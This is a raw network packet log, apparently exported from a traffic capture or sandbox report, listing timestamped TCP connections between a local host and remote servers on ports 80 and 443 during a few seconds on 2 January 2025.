                                                                            Jan 2, 2025 20:35:01.546967030 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.546977997 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.546989918 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.547038078 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.547038078 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.548502922 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.548515081 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.548526049 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.548556089 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.548624992 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.551996946 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.552010059 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.552021027 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.552031994 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.552087069 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.552087069 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.553731918 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.553744078 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.553754091 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.553766966 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.553774118 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.553778887 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.553828001 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.553828001 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.555773973 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.555785894 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.555804014 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.555814981 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.555851936 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.555851936 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.555937052 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.558959961 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.558974028 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.558985949 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.559045076 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.559045076 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.559205055 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.559216976 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.559228897 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.559266090 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.559266090 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.560730934 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.560744047 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.560755014 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.560791016 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.560842991 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.564408064 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.564419985 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.564429998 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.564486027 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.564486027 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.564706087 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.564718008 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.564728022 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.564753056 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.564781904 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.565792084 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.565821886 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.565850973 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.565850973 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.566091061 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.566126108 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.566134930 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.566162109 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.566162109 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.569514990 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.569525957 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.569538116 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.569547892 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.569581032 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.569581032 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.571012974 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.571049929 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.571059942 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.571070910 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.571080923 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.571082115 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.571110010 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.571157932 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.572741032 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.572751045 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.572768927 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.572781086 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.572789907 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.572813988 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.572813988 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.573004961 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.576308966 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.576322079 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.576333046 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.576344013 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.576355934 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.576391935 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.577991009 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.578002930 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.578016043 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.578026056 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.578027964 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.578073025 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.578073025 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.581444979 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.581459045 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.581470013 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.581510067 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.581510067 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.583065033 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.583116055 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.583148956 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.583148956 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.583182096 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.583228111 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.583233118 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.583240032 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.583250999 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.583281040 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.583323002 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.584861040 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.584904909 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.584919930 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.584930897 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.584940910 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.584944010 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.584944010 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.584989071 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.588334084 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.588346004 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.588357925 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.588368893 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.588402987 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.588402987 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.590122938 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.590136051 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.590147018 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.590157986 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.590189934 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.590219975 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.593470097 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.593482018 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.593491077 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.593503952 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.593513012 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.593559027 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.593559027 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.595143080 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.595175982 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.595186949 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.595200062 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.595212936 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.595212936 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.595330954 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.596930981 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.596951008 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.596962929 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.596972942 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.596986055 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.597024918 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.597024918 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.600301027 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.600312948 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.600348949 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.600349903 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.600361109 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.600372076 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.600379944 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.600379944 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.600466967 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.602071047 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.602118015 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.602128029 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.602149010 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.602164030 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.602174044 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.602204084 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.602204084 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.605544090 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.605580091 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.605612993 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.605631113 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.605640888 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.605648041 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.605648041 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.605648041 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.605676889 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.605729103 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.617146969 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.617162943 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.617182970 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.617198944 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.617208004 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.617218971 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.617229939 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.617239952 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.617252111 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.617261887 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.617261887 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.617435932 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.617435932 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.621752024 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.621783018 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.621794939 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.621805906 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.621804953 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.621818066 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.621829033 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.621840954 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.621844053 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.621844053 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.621922970 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.626966953 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.626983881 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.626995087 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.627005100 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.627017021 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.627028942 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.627039909 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.627048969 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.627048969 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.627051115 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.627091885 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.630399942 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.630444050 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.630448103 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.630455971 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.630475044 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.630486012 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.630501032 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.630517006 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.630517006 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.630518913 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.630532026 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.630585909 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.630585909 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.635267973 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.635329008 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.635337114 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.635340929 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.635354042 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.635364056 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.635377884 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.635389090 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.635390043 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.635390043 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.635401011 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.635416031 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.635464907 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.640496969 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.640518904 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.640531063 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.640542030 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.640553951 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.640564919 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.640582085 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.640604973 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.640604973 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.640604973 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.641927004 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.645734072 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.645816088 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.645859003 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.645859003 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.645862103 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.645874977 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.645899057 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.645909071 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.645925999 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.645935059 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.645935059 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.645935059 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.645965099 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.645966053 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.651062012 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.651096106 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.651114941 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.651114941 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.651129007 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.651140928 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.651154041 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.651153088 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.651153088 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.651166916 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.651180983 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.651227951 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.656179905 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.656275034 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.656279087 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.656290054 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.656301975 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.656312943 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.656325102 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.656336069 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.656346083 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.656363964 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.656363964 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.656405926 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.659473896 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.659512997 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.659523010 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.659523964 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.659544945 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.659557104 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:01.659559011 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.659585953 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.659601927 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.711280107 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:01.716125011 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:02.093417883 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:02.093442917 CET804974047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:35:02.093482971 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:02.093554974 CET4974080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:35:29.702555895 CET804973869.42.215.252192.168.2.4
                                                                            Jan 2, 2025 20:35:29.702617884 CET4973880192.168.2.469.42.215.252
                                                                            Jan 2, 2025 20:35:57.851216078 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:57.851255894 CET44349845142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:35:57.851327896 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:57.861076117 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:57.861099005 CET44349845142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:35:58.512104034 CET44349845142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:35:58.512195110 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:58.512892962 CET44349845142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:35:58.512959957 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:58.559667110 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:58.559700966 CET44349845142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:35:58.560065985 CET44349845142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:35:58.560126066 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:58.562103987 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:58.607327938 CET44349845142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:35:58.898123980 CET44349845142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:35:58.898185015 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:58.898448944 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:58.898474932 CET44349845142.250.186.142192.168.2.4
                                                                            Jan 2, 2025 20:35:58.898588896 CET49845443192.168.2.4142.250.186.142
                                                                            Jan 2, 2025 20:35:58.930852890 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:35:58.930907011 CET44349852142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:35:58.931333065 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:35:58.932199955 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:35:58.932214022 CET44349852142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:35:59.590174913 CET44349852142.250.185.225192.168.2.4
                                                                            Jan 2, 2025 20:35:59.590331078 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:35:59.594347000 CET49852443192.168.2.4142.250.185.225
                                                                            Jan 2, 2025 20:35:59.594364882 CET44349852142.250.185.225192.168.2.4
